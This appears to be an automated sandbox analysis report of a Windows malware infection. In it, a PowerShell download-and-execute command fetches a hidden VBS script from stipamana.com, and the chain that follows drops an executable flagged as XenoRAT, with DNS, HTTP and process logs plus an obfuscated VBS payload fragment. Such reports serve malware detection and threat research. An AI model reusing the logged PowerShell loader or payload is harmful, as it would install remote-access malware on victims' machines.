                                                                                                                                                Dec 9, 2024 06:52:37.400374889 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.400404930 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.400414944 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.409045935 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.409123898 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:37.410468102 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:37.410478115 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.410742998 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.411962032 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:37.455332041 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523181915 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523206949 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523293972 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.523344994 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.523425102 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.543941021 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.543972015 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.544044971 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.544080973 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.544106007 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.544332981 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.566895962 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.566931963 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.566970110 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.567003012 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.567020893 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.567049980 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.585676908 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.585706949 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.585755110 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.585781097 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.585793972 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.585851908 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.599436045 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.599463940 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.599512100 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.599528074 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.599556923 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.599566936 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.715768099 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.715826988 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.715851068 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.715864897 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.715894938 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.715909958 CET49727443192.168.2.794.156.167.57
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 06:52:23.958283901 CET | 62079 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:52:24.102601051 CET | 53 | 62079 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:52:54.279819012 CET | 63303 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:52:54.416631937 CET | 53 | 63303 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 06:52:23.958283901 CET | 192.168.2.7 | 1.1.1.1 | 0x1497 | Standard query (0) | www.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:54.279819012 CET | 192.168.2.7 | 1.1.1.1 | 0x3e83 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 06:52:24.102601051 CET | 1.1.1.1 | 192.168.2.7 | 0x1497 | No error (0) | www.stipamana.com |  | 94.156.167.57 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | svc.ha-teams.office.com | mira-tmc.tm-4.office.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.181 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.180 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.182 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.185 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.186 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.176 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.179 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:35.309721947 CET | 1.1.1.1 | 192.168.2.7 | 0x40a | No error (0) | mira-tmc.tm-4.office.com |  | 52.123.243.177 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:46.107664108 CET | 1.1.1.1 | 192.168.2.7 | 0x1bc0 | No error (0) | templatesmetadata.office.net | templatesmetadata.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:52:54.416631937 CET | 1.1.1.1 | 192.168.2.7 | 0x3e83 | No error (0) | dns.stipamana.com |  | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:58.234483004 CET | 1.1.1.1 | 192.168.2.7 | 0x8eb1 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:52:58.234483004 CET | 1.1.1.1 | 192.168.2.7 | 0x8eb1 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                                                                                • www.stipamana.com
                                                                                                                                                • ecs.office.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 94.156.167.57 | 443 | 2892 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 05:52:25 UTC | 145 | OUT | GET /vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs HTTP/1.1
Host: www.stipamana.com
Connection: Keep-Alive
2024-12-09 05:52:26 UTC | 209 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 05:52:26 GMT
Content-Length: 10363
Connection: close
Last-Modified: Sun, 08 Dec 2024 09:07:25 GMT
ETag: "287b-628be93924d40"
Accept-Ranges: bytes
2024-12-09 05:52:26 UTC | 10363 | IN | Data Ascii: Execute(chr(49+34)& chr(195-94)& chr(166-50)& chr(129-97)& chr(194-83)& chr(11+87)& chr(133-27)& chr(105-18)& chr(5670/54)& chr(174-64)& chr(7+65)& chr(4060/35)& chr(60+56)& chr(16*7)& chr(116-84)& chr(2013/33)& chr(-48+80)& chr(10+57)& chr(5814/51)& chr(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 94.156.167.57 | 443 | 6560 | C:\Windows\System32\wscript.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 05:52:28 UTC | 288 | OUT | GET /docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujghdnjyrtder/buildds.doc HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.stipamana.com
2024-12-09 05:52:28 UTC | 314 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 05:52:28 GMT
Content-Type: application/msword
Content-Length: 199680
Last-Modified: Sun, 08 Dec 2024 09:04:05 GMT
Connection: close
ETag: "67556105-30c00"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49727 | 94.156.167.57 | 443 | 7240 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp | Bytes transferred | Direction | Data
2024-12-09 05:52:36 UTC | 404 | OUT | GET /yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe HTTP/1.1
Accept: */*
Accept-Language: en-ch
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: www.stipamana.com
Connection: Keep-Alive
2024-12-09 05:52:37 UTC | 320 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 05:52:36 GMT
Content-Type: application/octet-stream
Content-Length: 177664
Last-Modified: Mon, 09 Dec 2024 04:36:17 GMT
Connection: close
ETag: "675673c1-2b600"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.74972852.123.243.1814437240C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-09 05:52:37 UTC807OUTGET /config/v2/Office/word/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7bF43EFEF1-5530-47E1-A9BD-92EAF33B7348%7d&Application=word&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=winword.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bA0E72725-605B-4822-B4DB-BD5E739C51EF%7d&LabMachine=false HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                If-None-Match: ""
                                                                                                                                                User-Agent: Microsoft Office 2014
                                                                                                                                                DisableExperiments: false
                                                                                                                                                X-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130
                                                                                                                                                Host: ecs.office.com
                                                                                                                                                2024-12-09 05:52:38 UTC | 1180 | IN | HTTP/1.1 200 OK
                                                                                                                                                Cache-Control: no-cache,max-age=14400
                                                                                                                                                Content-Length: 153570
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Expires: Mon, 09 Dec 2024 09:52:37 GMT
                                                                                                                                                ETag: "M6TuJPaDSPPL4PYR84lvamGXbguhsfjZMYkukuDEe7w="
                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                request-id: dd5bb81f-b3bd-3b79-2557-22e653ea87f8
                                                                                                                                                X-BackEndHttpStatus: 200
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Office&DestinationEndpoint=MIRA-WW-DX0&FrontEnd=MIRA"}],"include_subdomains":true}
                                                                                                                                                NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                                X-MSEdge-Ref: MIRA: dd5bb81f-b3bd-3b79-2557-22e653ea87f8 DX0P273CA0016 2024-12-09T05:52:29.350Z
                                                                                                                                                Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                                                                X-Proxy-BackendServerStatus: 200
                                                                                                                                                X-FirstHopCafeEFZ: DXB
                                                                                                                                                X-FEProxyInfo: DX0P273CA0016.AREP273.PROD.OUTLOOK.COM
                                                                                                                                                X-FEEFZInfo: DXB
                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                X-FEServer: DX0P273CA0016
                                                                                                                                                Date: Mon, 09 Dec 2024 05:52:29 GMT
                                                                                                                                                Connection: close



                                                                                                                                                Target ID:1
                                                                                                                                                Start time:00:52:17
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                                                                                                                                                Imagebase:0x7ff741d30000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:00:52:17
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:00:52:25
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs"
                                                                                                                                                Imagebase:0x7ff71bc30000
                                                                                                                                                File size:170'496 bytes
                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:00:52:28
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                Imagebase:0x50000
                                                                                                                                                File size:1'620'872 bytes
                                                                                                                                                MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:00:52:31
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                Imagebase:0x7ff7b4ee0000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:00:52:37
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe"
                                                                                                                                                Imagebase:0x520000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000015.00000002.1498518965.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000015.00000002.1498518965.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000015.00000002.1498518965.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:00:52:38
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0xa90000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:00:52:38
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0xed0000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:00:52:38
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x550000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000018.00000002.1481629234.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:02:03:14
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe"
                                                                                                                                                Imagebase:0x720000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000019.00000002.1512091151.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:02:03:15
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Imagebase:0x510000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:02:03:15
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:02:03:15
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                                                                                                                                                Imagebase:0xf10000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:02:03:26
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F
                                                                                                                                                Imagebase:0x2a0000
                                                                                                                                                File size:187'904 bytes
                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:02:03:26
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:02:03:27
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x6b0000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 0000001F.00000002.1647276247.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 0000001F.00000002.1647276247.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:02:03:28
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:33
                                                                                                                                                Start time:02:03:29
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x180000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:35
                                                                                                                                                Start time:02:03:30
